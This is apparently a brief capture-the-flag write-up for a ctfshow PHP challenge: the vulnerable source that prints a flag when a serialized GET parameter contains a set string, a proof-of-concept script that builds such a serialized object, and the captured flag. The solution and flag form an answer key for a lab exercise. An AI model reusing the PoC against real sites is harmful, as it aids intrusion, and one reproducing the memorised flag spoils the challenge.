PHP/5.6.40
<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
echo $flag;
}
poc
<?php
class ctfShowUser{
public $tari = 'ctfshow_i_love_36D';
}
$user = new ctfShowUser();
echo(urlencode(serialize($user)));
?>
flag
ctfshow{0ea2dc5e-4076-4396-bd34-7fee87b4e3a8}